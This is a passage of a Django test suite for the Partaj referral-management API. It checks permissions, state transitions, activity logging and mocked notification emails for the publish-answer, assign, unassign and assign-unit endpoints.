{"errors": ["Transition PUBLISH_ANSWER not allowed from state answered."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_closed_state(self, mock_mailer_send):
"""
A referral in the CLOSED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition PUBLISH_ANSWER not allowed from state closed."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
mock_mailer_send.assert_not_called()
# ASSIGN TESTS
def test_assign_referral_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot perform actions, including assignments.
"""
referral = factories.ReferralFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_random_logged_in_user(self, mock_mailer_send):
"""
Any random logged in user cannot assign a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_linked_user(self, mock_mailer_send):
"""
The referral's creator cannot assign it.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(user=user)
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_linked_unit_member(self, mock_mailer_send):
"""
Regular members of the linked unit cannot assign a referral.
"""
referral = factories.ReferralFactory()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_linked_unit_organizer(self, mock_mailer_send):
"""
Organizers of the linked unit can assign a referral.
"""
referral = factories.ReferralFactory()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
self.assertEqual(len(response.json()["assignees"]), 1)
self.assertEqual(response.json()["assignees"][0]["id"], str(assignee.id))
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
"to": [{"email": assignee.email}],
},
)
def test_assign_already_assigned_referral(self, mock_mailer_send):
"""
A referral which was assigned to one user can be assigned to an additional one,
staying in the ASSIGNED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
exsting_assignee = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
).assignee
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
self.assertEqual(len(response.json()["assignees"]), 2)
self.assertEqual(
response.json()["assignees"][0]["id"],
str(exsting_assignee.id),
)
self.assertEqual(
response.json()["assignees"][1]["id"],
str(assignee.id),
)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 2)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
"to": [{"email": assignee.email}],
},
)
def test_assign_referral_from_processing_state(self, mock_mailer_send):
"""
New assignments can be added on a referral in the PROCESSING state, the referral
then stays in the PROCESSING state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.PROCESSING)
self.assertEqual(len(response.json()["assignees"]), 1)
self.assertEqual(response.json()["assignees"][0]["id"], str(assignee.id))
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 1)
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
"to": [{"email": assignee.email}],
},
)
def test_assign_referral_from_in_validation_state(self, mock_mailer_send):
"""
New assignments can be added on a referral in the IN_VALIDATION state, the
referral then stays in the IN_VALIDATION state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(len(response.json()["assignees"]), 1)
self.assertEqual(response.json()["assignees"][0]["id"], str(assignee.id))
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 1)
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
"to": [{"email": assignee.email}],
},
)
def test_assign_referral_from_answered_state(self, mock_mailer_send):
"""
No new assignments can be added on a referral in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN not allowed from state answered."]},
)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_from_closed_state(self, mock_mailer_send):
"""
No new assignments can be added on a referral in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN not allowed from state closed."]},
)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
# UNASSIGN TESTS
def test_unassign_referral_by_anonymous_user(self, _):
"""
Anonymous users cannot perform actions, including assignment removals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignment": assignment.id},
)
self.assertEqual(response.status_code, 401)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_random_logged_in_user(self, _):
"""
Any random logged in user cannot unassign an assignee from a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignment": assignment.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_linked_user(self, _):
"""
The referral's creator cannot unassign an assignee from it.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.ASSIGNED, user=user
)
assignment = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignment": assignment.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_linked_unit_member(self, _):
"""
Regular members of the linked unit cannot unassign anyone (incl. themselves)
from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignee = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER
).user
assignment = factories.ReferralAssignmentFactory(
assignee=assignee,
referral=referral,
unit=referral.units.get(),
)
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignment": assignment.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=assignment.assignee)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_linked_unit_organizer(self, _):
"""
Organizers of the linked unit can unassign a member from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.RECEIVED)
self.assertEqual(response.json()["assignees"], [])
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(referral.assignees.count(), 0)
def test_unassign_referral_still_assigned_state(self, _):
"""
When a member is unassigned from a referral which has other assignees, the
referral remains in state ASSIGNED instead of moving to RECEIVED.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment_to_remove = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment_to_remove.created_by
assignment_to_keep = factories.ReferralAssignmentFactory(referral=referral)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment_to_remove.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
self.assertEqual(len(response.json()["assignees"]), 1)
self.assertEqual(
response.json()["assignees"][0]["id"], str(assignment_to_keep.assignee.id)
)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_from_processing_state(self, _):
"""
Users can be unassigned from units in the PROCESSING state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.PROCESSING)
self.assertEqual(response.json()["assignees"], [])
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(referral.assignees.count(), 0)
def test_unassign_referral_from_in_validation_state(self, _):
"""
Users can be unassigned from units in the IN_VALIDATION state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(response.json()["assignees"], [])
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(referral.assignees.count(), 0)
def test_unassign_referral_from_received_state(self, _):
"""
Users cannot be unassigned from units in the RECEIVED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition UNASSIGN not allowed from state received."]},
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_from_answered_state(self, _):
"""
Users cannot be unassigned from units in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition UNASSIGN not allowed from state answered."]},
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_from_closed_state(self, _):
"""
Users cannot be unassigned from units in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition UNASSIGN not allowed from state closed."]},
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(referral.assignees.count(), 1)
# ASSIGN UNIT TESTS
def test_assign_unit_referral_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot assign units to referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged-in users cannot assign units to referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_linked_user(self, mock_mailer_send):
"""
A referral's linked user cannot assign units to their referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.ASSIGNED, user=user
)
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_linked_unit_member(self, mock_mailer_send):
"""
A member of a referral's linked unit cannot assign units to referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_linked_unit_organizer(self, mock_mailer_send):
"""
An organizer of a referral's linked unit can assign units to referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
initial_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
other_unit_owner = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
self.assertEqual(len(response.json()["units"]), 2)
self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 2)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
link = (
f"https://partaj/app/unit/{str(other_unit.id)}"
f"/referrals-list/referral-detail/{referral.id}"
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": link,
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": other_unit.name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
"to": [{"email": other_unit_owner.email}],
}
)
def test_assign_unit_referral_nonexistent_unit(self, mock_mailer_send):
"""
The request returns an error response when the user attempts to assign a unit
that does not exist.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
random_uuid = uuid.uuid4()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": random_uuid},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": [f"Unit {random_uuid} does not exist."]},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_redundant_assignment(self, mock_mailer_send):
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
with transaction.atomic():
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
f"Unit {referral.units.get().id} is already assigned to referral."
]
},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_from_received_state(self, mock_mailer_send):
"""
New unit assignments can be added on a referral in the RECEIVED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
initial_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
other_unit_owner = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.RECEIVED)
self.assertEqual(len(response.json()["units"]), 2)
self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 2)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
link = (
f"https://partaj/app/unit/{str(other_unit.id)}"
f"/referrals-list/referral-detail/{referral.id}"
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": link,
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": other_unit.name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
"to": [{"email": other_unit_owner.email}],
}
)
def test_assign_unit_referral_from_processing_state(self, mock_mailer_send):
"""
New unit assignments can be added on a referral in the PROCESSING state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
initial_unit = referral.units.get()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
other_unit_owner = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=other_unit
).user
self.assertEqual(referral.units.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.PROCESSING)
self.assertEqual(len(response.json()["units"]), 2)
self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 2)
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
referral=referral,
).count(),
1,
)
link = (
f"https://partaj/app/unit/{str(other_unit.id)}"
